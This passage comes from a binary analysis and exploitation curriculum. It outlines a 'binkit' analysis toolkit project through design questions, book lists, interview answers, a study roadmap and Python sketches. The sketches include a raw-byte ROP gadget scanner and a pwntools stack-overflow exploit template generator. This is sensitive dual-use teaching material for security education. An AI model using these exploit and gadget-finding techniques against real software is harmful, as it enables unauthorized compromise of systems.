- Implementing consistent flag patterns and output formats

*Guiding Questions:*
- Should `binkit analyze` show everything by default, or require flags like `--full`?
- How do you make output both human-readable and machine-parseable?
- What's the right balance between subcommands (`binkit disasm`) vs flags (`binkit --disasm`)?
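One way to prototype the subcommand layout (the `binkit disasm` style, as git uses) is with Python's argparse; the `binkit` commands and flags here are hypothetical:

```python
import argparse

def build_cli():
    """Subcommand-style CLI skeleton for the hypothetical binkit."""
    parser = argparse.ArgumentParser(prog="binkit")
    sub = parser.add_subparsers(dest="command", required=True)

    analyze = sub.add_parser("analyze", help="full analysis report")
    analyze.add_argument("binary")
    analyze.add_argument("--checks", default="all")
    analyze.add_argument("--json", action="store_true",
                         help="machine-parseable output")

    disasm = sub.add_parser("disasm", help="disassemble a range")
    disasm.add_argument("binary")
    disasm.add_argument("address")
    disasm.add_argument("count", type=int, nargs="?", default=10)
    return parser

args = build_cli().parse_args(["analyze", "a.elf", "--json"])
```

Sketching the parser early forces the "subcommands vs flags" decision before any analysis code exists.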

*Book References:*
- "The Art of UNIX Programming" by Eric S. Raymond - Chapter 10-11: CLI Design, User Interfaces
- "The Linux Command Line" by William Shotts - Chapter 24-25: Writing Shell Scripts
- "Designing Command-Line Interfaces" (online guide)

**3. Vulnerability Detection Heuristics**
- Pattern matching for dangerous functions (gets, strcpy, system)
- Control flow analysis to detect potential exploits (unbounded loops, format strings)
- Understanding false positives vs false negatives in static analysis

*Guiding Questions:*
- How do you detect `strcpy` usage that might actually be safe (bounded by prior checks)?
- What's the difference between a security vulnerability and a code smell?
- How should you prioritize findings: critical, high, medium, low?

*Book References:*
- "Practical Binary Analysis" by Dennis Andriesse - Chapter 6-7: Disassembly, CFG Analysis
- "The Art of Software Security Assessment" by Dowd, McDonald, Schuh - Chapter 7-8: Program Analysis
- "Hacking: The Art of Exploitation" by Jon Erickson - Chapter 3-4: Exploitation Techniques

**4. ROP Gadget Finding and Chain Construction**
- Searching binary for useful gadgets (pop/ret, arithmetic, syscall)
- Understanding gadget constraints (bad bytes, alignment, clobbering)
- Automating ROP chain construction based on target objectives

*Guiding Questions:*
- How do you find gadgets that pop multiple registers in sequence?
- What's the algorithm for searching a binary for `pop rdi; ret` patterns?
- How do you handle position-independent executables (PIE) when building ROP chains?

*Book References:*
- "The Shellcoder's Handbook" by Anley et al. - Chapter 7: Return-Oriented Programming
- "Practical Binary Analysis" by Dennis Andriesse - Chapter 11: Principles of Dynamic Analysis
- "Hacking: The Art of Exploitation" by Jon Erickson - Chapter 5: Exploitation

**5. Exploit Template Generation**
- Creating reusable pwntools templates for common vulnerabilities
- Parameterizing exploits for different targets (local, remote, different libcs)
- Generating descriptive comments that explain the exploit strategy

*Guiding Questions:*
- How do you auto-generate the offset calculation for a buffer overflow?
- What information should your template include: libc version, gadget addresses, shellcode?
- How can you make the generated exploit educational, not just functional?
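A minimal sketch of template generation: render a pwntools-style script as text from caller-supplied parameters. Nothing is executed here, and the offset/address values are placeholders the analyzer would compute:

```python
TEMPLATE = '''\
# Auto-generated exploit template -- review before use!
# Strategy: overflow the {func}() buffer, overwrite the saved
# return address at offset {offset}, return into {target:#x}.
from pwn import *

io = process("{binary}")
payload  = b"A" * {offset}       # padding up to saved RIP
payload += p64({target:#x})      # overwrite return address
io.sendline(payload)
io.interactive()
'''

def generate_exploit(binary, func, offset, target):
    """Render an educational pwntools template for a stack overflow."""
    return TEMPLATE.format(binary=binary, func=func,
                           offset=offset, target=target)
```

The comments baked into the template are what make the output educational rather than just functional.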

*Book References:*
- pwntools documentation - "Getting Started" and "Exploit Templates"
- "Practical Binary Analysis" by Dennis Andriesse - Chapter 12: Dynamic Analysis
- CTF101 Binary Exploitation Guide (online)

**6. Report Generation and Output Formatting**
- Creating clear, actionable security reports for different audiences
- Balancing technical detail with executive summaries
- Using visual elements (ASCII art, color coding) for clarity

*Guiding Questions:*
- What should a security report include: executive summary, technical details, recommendations?
- How do you visualize a ROP chain or control flow in a text report?
- Should your tool output JSON for integration with other tools?
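One answer to the JSON question above is to keep a single findings structure and derive both the machine output and the executive counts from it; the field names below are illustrative:

```python
import json
from collections import Counter

def build_report(target, findings):
    """Produce one report dict usable both for JSON output and for a
    human summary (counts per severity level)."""
    summary = Counter(f["severity"] for f in findings)
    return {
        "target": target,
        "summary": dict(summary),   # e.g. {"high": 2, "low": 1}
        "findings": findings,
    }

def to_json(report):
    """Machine-readable serialization for pipelines and other tools."""
    return json.dumps(report, indent=2)
```

HTML or console renderers would consume the same dict, so the analysis logic is never duplicated per output format.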

*Book References:*
- "The Art of Software Security Assessment" by Dowd, McDonald, Schuh - Chapter 2: Design Review
- "Writing for Computer Science" by Justin Zobel - Chapter 3-4: Technical Writing
- "Beautiful Code" by Oram & Wilson - Chapter 17: Pretty-Printing

**7. Testing and Quality Assurance**
- Unit testing binary parsers with malformed inputs
- Integration testing the full analysis pipeline
- Creating a test corpus of diverse binaries

*Guiding Questions:*
- How do you test your ELF parser against malicious/malformed files?
- What binaries should be in your test suite: simple, complex, obfuscated, different architectures?
- How do you verify that your vulnerability detection doesn't have false negatives?
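One way to start testing against malformed inputs is a header validator that fails loudly instead of crashing later; `parse_elf_ident` below is a hypothetical minimal example, exercised with truncated and corrupt bytes:

```python
ELF_MAGIC = b"\x7fELF"

def parse_elf_ident(data: bytes):
    """Validate the start of an ELF e_ident and return (bits, endianness).
    Raises ValueError on truncated or corrupt input -- exactly the
    behavior malformed-input tests should pin down."""
    if len(data) < 16:
        raise ValueError("truncated e_ident")
    if data[:4] != ELF_MAGIC:
        raise ValueError("bad ELF magic")
    bits = {1: 32, 2: 64}.get(data[4])       # EI_CLASS
    endian = {1: "little", 2: "big"}.get(data[5])  # EI_DATA
    if bits is None or endian is None:
        raise ValueError("invalid EI_CLASS or EI_DATA")
    return bits, endian
```

Fuzzing this function with random byte strings is a cheap way to hunt for inputs that raise anything other than ValueError.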

*Book References:*
- "The Art of Software Testing" by Glenford Myers - Chapter 2-3: Test Case Design
- "Working Effectively with Legacy Code" by Michael Feathers - Chapter 9-10: Dependency Breaking
- "Practical Binary Analysis" by Dennis Andriesse - Chapter 9: Binary Analysis in Practice

### Questions to Guide Your Design

1. **User-Centric Design**: Who is your target user—CTF players, security researchers, malware analysts? How does this affect feature priorities?

2. **Scope Creep**: Which features are essential for v1.0, and which can wait? Should you support Windows PE and Linux ELF initially, or just one?

3. **Performance vs Accuracy**: Should vulnerability detection be fast and approximate, or slow and precise? How do you let users choose?

4. **Integration Philosophy**: Should your tool replace existing tools (pwntools, checksec, ropper), or complement them? Do you wrap existing tools or reimplement?

5. **Output Flexibility**: How do you support different output formats (JSON, XML, HTML, PDF) without duplicating logic?

6. **Extensibility vs Simplicity**: Do you build a plugin system from day one, or start simple and refactor later?

7. **Error Handling**: When analyzing a malformed binary, should you fail fast or attempt best-effort analysis?

8. **Distribution Strategy**: How will users install your tool—pip, git clone, Docker? Does this affect your architecture?

### Thinking Exercise

**Exercise 1: Architecture Design Session**
Sketch the high-level architecture of your toolkit:

```
 Input Layer          Core Layer                    Output Layer
[Binary File] --> [Parser] --> [Analyzer] --> [Report Generator]
                     |             |                  |
                 [Plugin        [Vuln             [Console/
                  System]      Detector]         JSON/HTML]
```


Questions to answer:
- What data flows between components?
- Where do you store intermediate results (AST, CFG, symbol table)?
- How do components communicate: function calls, message passing, shared state?

**Exercise 2: API Design**
Design the Python API for your toolkit:

```python
from binkit import Binary

# How should users interact with your tool?
binary = Binary.load('suspicious.elf')
binary.analyze()  # or .parse(), .disassemble()?
vulns = binary.find_vulnerabilities()
report = binary.generate_report(format='json')

# Alternative API?
from binkit import analyze
result = analyze('suspicious.elf', depth='full', output='json')
```

Reflection: Which API is more intuitive? More flexible? Easier to test?

**Exercise 3: Test-Driven Development**
Before writing code, write test cases:

```python
def test_elf_parser_handles_32bit():
    binary = Binary.load('test_binaries/hello_32.elf')
    assert binary.arch == 'i386'
    assert binary.bits == 32

def test_detects_buffer_overflow():
    binary = Binary.load('test_binaries/bof.elf')
    vulns = binary.find_vulnerabilities()
    assert any(v.type == 'buffer_overflow' for v in vulns)
```

Reflection: What edge cases should you test? How do you get test binaries?

**Exercise 4: CLI Mockup**
Design the command-line interface on paper before coding:

```bash
# Option 1: Subcommands
binkit parse binary.elf
binkit analyze binary.elf --checks=all
binkit exploit binary.elf --output=pwn.py

# Option 2: Flags
binkit binary.elf --parse --analyze --exploit

# Option 3: Swiss Army Knife
binkit binary.elf          # does everything
binkit binary.elf --quick  # fast scan only
```

Reflection: Which design is most intuitive? Try explaining it to a colleague.

The Interview Questions They’ll Ask

Architecture and Design:

  1. Q: How would you design a plugin system for supporting new binary formats? A: Define an abstract base class BinaryParser with methods like parse(), get_sections(), get_symbols(). Each format (ELF, PE, Mach-O) implements this interface. Use a registry pattern to discover and load parsers at runtime.

  2. Q: Your vulnerability detector has many false positives. How do you improve it? A: Implement context-aware analysis: check if dangerous functions are actually reachable, if input is validated beforehand, if buffers are properly bounds-checked. Add confidence scores to findings. Allow users to suppress false positives with configuration files.

  3. Q: How do you handle large binaries (100MB+) efficiently? A: Implement lazy loading: parse headers immediately, but only disassemble/analyze sections on-demand. Use generators instead of loading entire disassembly into memory. Consider caching analysis results to disk.
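The registry pattern from Q1 above can be sketched as follows; the class and function names are illustrative, and real parsing is elided:

```python
from abc import ABC, abstractmethod

PARSER_REGISTRY = []

def register(cls):
    """Class decorator: add a parser class to the global registry."""
    PARSER_REGISTRY.append(cls)
    return cls

class BinaryParser(ABC):
    @classmethod
    @abstractmethod
    def can_parse(cls, data: bytes) -> bool: ...

    @abstractmethod
    def get_sections(self): ...

@register
class ElfParser(BinaryParser):
    @classmethod
    def can_parse(cls, data):
        return data[:4] == b"\x7fELF"

    def get_sections(self):
        return []  # real parsing elided

def find_parser(data: bytes):
    """Dispatch to the first registered parser that accepts the bytes."""
    for cls in PARSER_REGISTRY:
        if cls.can_parse(data):
            return cls()
    raise ValueError("unsupported format")
```

Adding PE or Mach-O support then means writing one new class with `@register`, with no changes to the analyzer side.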

Technical Implementation:

  1. Q: How would you auto-detect the binary format (ELF vs PE vs Mach-O)? A: Read the first few bytes (magic numbers): ELF starts with \x7fELF, PE with MZ, Mach-O with \xfe\xed\xfa\xce or \xcf\xfa\xed\xfe. Implement a dispatcher that tries each parser in sequence.

  2. Q: Your ROP gadget finder is too slow. How do you optimize it? A: Instead of regex on disassembly text, search raw bytes for instruction patterns. Use a sliding window over executable sections. Cache results. Parallelize across sections. Consider using an existing library like ROPgadget or ropper.

  3. Q: How do you test your tool against malicious/malformed binaries without compromising security? A: Run tests in Docker containers or VMs. Use fuzzing to generate malformed inputs. Include known-bad binaries (malware samples) in test suite. Implement timeout mechanisms for analysis that hangs.
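The raw-byte gadget search from Q2 can be sketched as below. The patterns are the standard x86-64 encodings (`pop rdi` is 5f, `pop rsi` is 5e, `ret` is c3), and searching bytes directly avoids disassembling to text at all:

```python
# x86-64 encodings for common single-pop gadgets (pop reg; ret).
GADGETS = {
    b"\x5f\xc3": "pop rdi; ret",
    b"\x5e\xc3": "pop rsi; ret",
    b"\x5a\xc3": "pop rdx; ret",
    b"\x58\xc3": "pop rax; ret",
}

def find_gadgets(code: bytes, base: int = 0):
    """Scan raw executable bytes for gadget byte patterns.
    Returns sorted (address, mnemonic) pairs; `base` is the
    section's load address."""
    hits = []
    for pattern, name in GADGETS.items():
        start = 0
        while (idx := code.find(pattern, start)) != -1:
            hits.append((base + idx, name))
            start = idx + 1  # overlapping matches count too
    return sorted(hits)
```

Because x86 allows jumping mid-instruction, matches inside longer instructions are still valid gadgets, which is why a byte-level scan finds more than a linear disassembler would.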

Tool Integration:

  1. Q: Should your tool reimplement disassembly or use Capstone/LLVM? A: Use existing libraries like Capstone for disassembly—it’s battle-tested, supports multiple architectures, and is well-maintained. Focus your effort on higher-level analysis, not reinventing wheels.

  2. Q: How would you integrate your tool with CI/CD pipelines for automated binary analysis? A: Support JSON output for machine parsing. Provide exit codes indicating severity (0=no vulns, 1=low, 2=high, etc.). Allow configuration via files (.binkit.yml). Generate reports in standard formats (SARIF, JSON).
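The exit-code convention mentioned above can be sketched as a tiny mapping; the exact severity-to-code values here are an assumption to illustrate the idea:

```python
# Assumed convention: 0 = clean, higher numbers = worse findings.
SEVERITY_CODE = {"low": 1, "medium": 2, "high": 3, "critical": 4}

def exit_code(findings) -> int:
    """Exit code for the most severe finding (0 if none), so a CI
    job can fail the build with a threshold check on $?."""
    if not findings:
        return 0
    return max(SEVERITY_CODE[f["severity"]] for f in findings)
```

A pipeline could then gate merges with something like `binkit analyze app; test $? -lt 3`.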

User Experience:

  1. Q: A user reports your tool crashes on a specific binary. How do you debug? A: Ask for the binary sample (if shareable). Add verbose logging (--debug flag). Wrap risky operations in try/except with detailed error messages. Create a minimal reproduction case and add to test suite.

  2. Q: How do you make your complex tool approachable for beginners? A: Provide sensible defaults (just run binkit binary.elf). Include a tutorial/quickstart. Generate helpful error messages. Add --examples flag showing common use cases. Create comprehensive documentation with screenshots.

Books That Will Help

| Topic | Book | Chapters | Why It Helps |
|-------|------|----------|--------------|
| Software Architecture | “Clean Architecture” by Robert C. Martin | Ch 15-22: Architecture, Components | Learn how to structure a large system into maintainable, testable modules |
| CLI Design | “The Art of UNIX Programming” by Eric S. Raymond | Ch 10-11: CLI Design, Interfaces | Design command-line tools that feel natural and compose well with other tools |
| Binary Analysis Foundation | “Practical Binary Analysis” by Dennis Andriesse | Ch 1-9: All chapters | Comprehensive guide to everything your toolkit needs to do—this is your blueprint |
| Testing Strategy | “The Art of Software Testing” by Glenford Myers | Ch 2-5: Test Design, Techniques | Learn how to test your binary parser and analysis engine thoroughly |
| Python Best Practices | “Fluent Python” by Luciano Ramalho | Ch 5-7: Classes, Objects, Functions | Write clean, Pythonic code for your toolkit—proper OOP, generators, decorators |
| Vulnerability Detection | “The Art of Software Security Assessment” by Dowd, McDonald, Schuh | Ch 7-8: Program Analysis | Understand what vulnerabilities look like and how to detect them programmatically |
| ROP and Exploitation | “The Shellcoder’s Handbook” by Anley et al. | Ch 7: Return-Oriented Programming | Learn ROP fundamentals to build your gadget finder and chain constructor |
| Disassembly Deep Dive | “Computer Systems: A Programmer’s Perspective” by Bryant & O’Hallaron | Ch 3: Machine-Level Programming | Understand instruction encoding for disassembler integration |
| File Format Specs | “Practical Binary Analysis” by Dennis Andriesse | Ch 2-3: ELF Format, PE Format | Reference for parsing binary formats correctly |
| Tool Development | “Beautiful Code” by Oram & Wilson | Ch 2, 9, 17: Various tool chapters | Learn from examples of well-designed analysis tools and libraries |
| Project Organization | “The Pragmatic Programmer” by Hunt & Thomas | Ch 1-2: Pragmatic Philosophy, Approach | Best practices for organizing and evolving a large codebase |
| Error Handling | “Release It!” by Michael Nygard | Ch 4-5: Stability Patterns | Learn how to make your tool robust against malformed inputs and edge cases |


Project Comparison Table

| # | Project | Difficulty | Time | Key Skill | Fun |
|---|---------|------------|------|-----------|-----|
| 1 | ELF Parser | ⭐⭐ | 1-2 weeks | File Formats | ⭐⭐⭐ |
| 2 | PE Parser | ⭐⭐ | 1-2 weeks | Windows Formats | ⭐⭐⭐ |
| 3 | Disassembler | ⭐⭐⭐ | 2-4 weeks | Instruction Encoding | ⭐⭐⭐⭐ |
| 4 | GDB Deep Dive | ⭐⭐ | 1-2 weeks | Debugging | ⭐⭐⭐⭐ |
| 5 | Ghidra RE | ⭐⭐ | 2-3 weeks | Static Analysis | ⭐⭐⭐⭐ |
| 6 | Crackmes | ⭐⭐ | 2-4 weeks | Reverse Engineering | ⭐⭐⭐⭐⭐ |
| 7 | Buffer Overflow | ⭐⭐⭐ | 3-4 weeks | Exploitation | ⭐⭐⭐⭐⭐ |
| 8 | ROP Chains | ⭐⭐⭐⭐ | 2-3 weeks | Advanced Exploitation | ⭐⭐⭐⭐⭐ |
| 9 | strace/ltrace | | 3-5 days | Dynamic Analysis | ⭐⭐⭐ |
| 10 | Malware Lab | ⭐⭐⭐ | 4-6 weeks | Malware Analysis | ⭐⭐⭐⭐⭐ |
| 11 | angr | ⭐⭐⭐⭐ | 2-3 weeks | Symbolic Execution | ⭐⭐⭐⭐ |
| 12 | Fuzzing | ⭐⭐⭐ | 2-3 weeks | Vulnerability Discovery | ⭐⭐⭐⭐ |
| 13 | Binary Diffing | ⭐⭐ | 1-2 weeks | Patch Analysis | ⭐⭐⭐ |
| 14 | Anti-Debug Bypass | ⭐⭐⭐ | 2-3 weeks | Anti-Analysis | ⭐⭐⭐⭐ |
| 15 | Decompiler | ⭐⭐⭐⭐⭐ | 2-3 months | Code Recovery | ⭐⭐⭐⭐ |
| 16 | CTF Practice | ⭐⭐⭐ | Ongoing | Competition Skills | ⭐⭐⭐⭐⭐ |
| 17 | radare2 Mastery | ⭐⭐ | 2-3 weeks | CLI Tools | ⭐⭐⭐⭐ |
| 18 | Complete Toolkit | ⭐⭐⭐⭐⭐ | 2-3 months | Integration | ⭐⭐⭐⭐ |

Phase 1: Foundations (4-6 weeks)

Build understanding of binary formats and tools:

  1. Project 1: ELF Parser - Understand Linux binaries
  2. Project 2: PE Parser - Understand Windows binaries
  3. Project 4: GDB Deep Dive - Master debugging
  4. Project 9: strace/ltrace - Quick dynamic analysis

Phase 2: Reverse Engineering (4-6 weeks)

Learn to understand unknown binaries:

  1. Project 5: Ghidra RE - Static analysis
  2. Project 17: radare2 Mastery - CLI analysis
  3. Project 6: Crackme Challenges - Apply skills

Phase 3: Exploitation (6-8 weeks)

Learn to exploit vulnerabilities:

  1. Project 7: Buffer Overflow - Basic exploitation
  2. Project 8: ROP Chains - Bypass protections
  3. Project 16: CTF Practice - Competition experience

Phase 4: Advanced Analysis (6-8 weeks)

Master advanced techniques:

  1. Project 10: Malware Lab - Real-world analysis
  2. Project 11: angr - Automated analysis
  3. Project 12: Fuzzing - Vulnerability discovery
  4. Project 14: Anti-Debug Bypass - Defeat protections

Phase 5: Mastery (2-4 months)

Build professional tools:

  1. Project 3: Disassembler - Deep instruction knowledge
  2. Project 13: Binary Diffing - Patch analysis
  3. Project 15: Decompiler - Code recovery
  4. Project 18: Complete Toolkit - Professional tools

Summary

| # | Project | Main Language |
|---|---------|---------------|
| 1 | ELF File Parser | C |
| 2 | PE File Parser | C |
| 3 | Build a Disassembler | C |
| 4 | GDB Debugging Deep Dive | GDB/Python |
| 5 | Ghidra Reverse Engineering | Ghidra/Java |
| 6 | Crackme Challenges | Assembly/Python |
| 7 | Buffer Overflow Exploitation | C/Python |
| 8 | Return-Oriented Programming | Python |
| 9 | Dynamic Analysis (strace/ltrace) | Shell |
| 10 | Malware Analysis Lab | Assembly/Python |
| 11 | Symbolic Execution (angr) | Python |
| 12 | Fuzzing with AFL++ | C/Shell |
| 13 | Binary Diffing | Python |
| 14 | Anti-Debugging Bypass | Assembly/Python |
| 15 | Build a Decompiler | Python |
| 16 | CTF Binary Exploitation | Python |
| 17 | radare2 Mastery | r2/Python |
| 18 | Complete Binary Analysis Toolkit | Python |

Resources

Essential Books

  • “Practical Binary Analysis” by Dennis Andriesse - Best overall introduction
  • “Hacking: The Art of Exploitation” by Jon Erickson - Classic exploitation book
  • “Practical Malware Analysis” by Sikorski & Honig - Malware-focused
  • “Reversing: Secrets of Reverse Engineering” by Eldad Eilam - In-depth RE
  • “The Shellcoder’s Handbook” - Advanced exploitation

Tools

  • Ghidra: https://ghidra-sre.org/ - Free decompiler
  • radare2: https://rada.re/ - Open source RE framework
  • pwntools: https://docs.pwntools.com/ - Exploit development
  • angr: https://angr.io/ - Binary analysis framework
  • AFL++: https://aflplus.plus/ - Fuzzer

Practice Platforms

  • pwnable.kr: https://pwnable.kr/ - CTF challenges
  • crackmes.one: https://crackmes.one/ - Reverse engineering
  • ROP Emporium: https://ropemporium.com/ - ROP practice
  • Nightmare: https://guyinatuxedo.github.io/ - Walkthroughs

Reference Materials


Total Estimated Time: 8-12 months of dedicated study

After completion: You’ll be able to analyze any binary, find vulnerabilities, write exploits, analyze malware, and build professional reverse engineering tools. These skills are in high demand for security research, vulnerability assessment, malware analysis, and CTF competitions.